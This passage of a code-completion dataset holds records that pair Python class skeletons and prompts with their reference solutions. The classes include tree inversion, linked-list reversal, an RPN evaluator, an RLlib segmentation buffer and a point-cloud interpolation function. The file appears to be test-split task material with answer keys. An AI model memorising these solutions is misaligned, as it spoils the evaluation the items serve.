m)\n return _ext.three_interpolate(features, idx, weight)\n<|end_body_0|>\n\n<|body_start_1|>\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n<|end_body_1|>\n", "revision_id": "c0eecf2223c3c28d048d816fd239c118b8568dcf", "skeleton": "<|skeleton|>\nclass ThreeInterpolate:\n\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n <|body_0|>\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor 
(B, c, m) tensor with gradients of features None None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ThreeInterpolate:\n def forward(ctx, features, idx, weight):\n \"\"\"Performs weighted linear interpolation on 3 features Parameters ---------- features : torch.Tensor (B, c, m) Features descriptors to be interpolated from idx : torch.Tensor (B, n, 3) three nearest neighbors of the target features in features weight : torch.Tensor (B, n, 3) weights Returns ------- torch.Tensor (B, c, n) tensor of the interpolated features\"\"\"\n B, c, m = features.size()\n n = idx.size(1)\n ctx.three_interpolate_for_backward = (idx, weight, m)\n return _ext.three_interpolate(features, idx, weight)\n\n def backward(ctx, grad_out):\n \"\"\"Parameters ---------- grad_out : torch.Tensor (B, c, n) tensor with gradients of outputs Returns ------- grad_features : torch.Tensor (B, c, m) tensor with gradients of features None None\"\"\"\n idx, weight, m = ctx.three_interpolate_for_backward\n grad_features = _ext.three_interpolate_grad(grad_out.contiguous(), idx, weight, m)\n return (grad_features, None, None)\n", "source": "the_stack_v2_python_sparse", "source_path": "pointcloud/pointnet2/utils/pointnet2_utils.py", "source_repo": "WangLi2019Gt/qpu_code", "split": "test", "star_events_count": 0} {"blob_id": "301d75a534aea9eefb43b223f8f8041d56b2cd13", "bodies": ["if not root:\n return None\nleft = self.invertTree(root.left)\nright = self.invertTree(root.right)\nroot.left = right\nroot.right = left\nreturn root", "if not root:\n return None\nq = deque([root])\nwhile len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000240", "length_bytes": 1056, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: TreeNode Recursive solution", "name": "invertTree", "signature": "def invertTree(self, root)"}, 
{"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "invertTree1", "signature": "def invertTree1(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005908", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def invertTree(self, root): :type root: TreeNode :rtype: TreeNode Recursive solution\n- def invertTree1(self, root): :type root: TreeNode :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def invertTree(self, root): :type root: TreeNode :rtype: TreeNode Recursive solution\n- def invertTree1(self, root): :type root: TreeNode :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n<|end_body_1|>\n", "revision_id": "385ca03d51c8892eccf9ca5b920158d569edc375", "skeleton": "<|skeleton|>\nclass Solution:\n\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n <|body_0|>\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def invertTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode Recursive solution\"\"\"\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "Leetcode/BSTQuestions/invertbinarytree.py", "source_repo": "nanaboat/data-structures", "split": "test", "star_events_count": 0} {"blob_id": "161dccc492b6da747c3a26392360b25c06096edf", "bodies": ["def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\nself.buffers = defaultdict(new_buffer)", "batch = batch.copy()\nbatch = batch.as_multi_agent()\nfor policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)", "samples = {}\nfor policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\nreturn MultiAgentBatch(samples, batch_size)"], "bodies_text": "<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = 
defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "class_docstring": "A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.", "class_name": "MultiAgentSegmentationBuffer", "detected_licenses": ["MIT", "BSD-3-Clause", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000241", "length_bytes": 7703, "license_type": "permissive", "methods": [{"docstring": "Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.", "name": "__init__", "signature": "def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000)"}, {"docstring": "Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.", "name": "add", "signature": "def add(self, batch: SampleBatchType)"}, {"docstring": "Sample segments from the buffer. Args: batch_size: number of segments to sample. 
Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }", "name": "sample", "signature": "def sample(self, batch_size: int) -> MultiAgentBatch"}], "n_methods": 3, "prompt": "Implement the Python class `MultiAgentSegmentationBuffer` described below.\n\nClass description:\nA minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\n\nMethod signatures and docstrings:\n- def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000): Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\n- def add(self, batch: SampleBatchType): Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\n- def sample(self, batch_size: int) -> MultiAgentBatch: Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }", "prompted_full_text": "Implement the Python class `MultiAgentSegmentationBuffer` described below.\n\nClass description:\nA minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\n\nMethod signatures and docstrings:\n- def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000): Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\n- def add(self, batch: SampleBatchType): Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\n- def sample(self, batch_size: int) -> MultiAgentBatch: Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\n\n<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. 
Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "revision_id": "edba68c3e7cf255d1d6479329f305adb7fa4c3ed", "skeleton": "<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. 
Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "rllib/algorithms/dt/segmentation_buffer.py", "source_repo": "ray-project/ray", "split": "test", "star_events_count": 29482} {"blob_id": "327da6abc07a82011d66b2f7f0e0f52448c528e0", "bodies": ["if not head:\n return head\ncur = head\npre = None\nr = cur\nwhile cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\nreturn r", "if not head or not head.next:\n return head\nnode = self.reverseList(head.next)\nhead.next.next = head\nhead.next = None\nreturn node"], "bodies_text": "<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000242", "length_bytes": 945, "license_type": "no_license", "methods": [{"docstring": ":type head: ListNode :rtype: ListNode", "name": "reverseList1", "signature": "def reverseList1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "reverseList", "signature": "def reverseList(self, head)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList1(self, head): :type head: ListNode :rtype: ListNode\n- def reverseList(self, head): :type head: ListNode :rtype: ListNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList1(self, head): :type head: ListNode :rtype: ListNode\n- def reverseList(self, head): :type head: ListNode :rtype: ListNode\n\n<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return 
r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "revision_id": "e5b018493bbd12edcdcd0434f35d9c358106d391", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n", "source": "the_stack_v2_python_sparse", "source_path": "py/leetcode/206.py", "source_repo": "wfeng1991/learnpy", "split": "test", "star_events_count": 0} {"blob_id": "e7085d064b12f79c494c6e711c10d8c47f98ac1b", "bodies": ["self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\nself.modConfigs = ConvertConfigsToDictionary(modConfigs)\nself.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\nself.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\nself.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)", "self.filename = filename\nfor name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)"], "bodies_text": "<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "class_docstring": "Represents the configuration for a knot package", "class_name": "PackageConfig", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000243", "length_bytes": 957, 
"license_type": "no_license", "methods": [{"docstring": "Initialize the widget config with its widgets, positioning policies and sizing policies", "name": "__init__", "signature": "def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs)"}, {"docstring": "Set the package filename", "name": "setPackageFilename", "signature": "def setPackageFilename(self, filename)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003068", "prompt": "Implement the Python class `PackageConfig` described below.\n\nClass description:\nRepresents the configuration for a knot package\n\nMethod signatures and docstrings:\n- def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs): Initialize the widget config with its widgets, positioning policies and sizing policies\n- def setPackageFilename(self, filename): Set the package filename", "prompted_full_text": "Implement the Python class `PackageConfig` described below.\n\nClass description:\nRepresents the configuration for a knot package\n\nMethod signatures and docstrings:\n- def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs): Initialize the widget config with its widgets, positioning policies and sizing policies\n- def setPackageFilename(self, filename): Set the package filename\n\n<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "revision_id": "19b7bf08658ce329c7b076ce2014bae9f5f09268", "skeleton": "<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = 
ConvertConfigsToDictionary(serviceConfigs)\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/knot/loader/config/package_config.py", "source_repo": "cloew/Knot", "split": "test", "star_events_count": 1} {"blob_id": "a155f34bbe13a1ec52071b4086b404e330d3827a", "bodies": ["stack = []\nfor token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\nreturn int(stack[0])", "op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\nn = len(tokens)\nstack = [0] * ((n + 1) // 2)\nindex = -1\nfor token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\nreturn stack[0]"], "bodies_text": "<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000244", "length_bytes": 1540, "license_type": "no_license", "methods": [{"docstring": "栈", "name": "evalRPN", "signature": "def evalRPN(self, tokens: List[str]) -> int"}, {"docstring": "数组模拟栈", "name": "evalRPNArray", "signature": "def evalRPNArray(self, tokens: List[str]) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006825", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the 
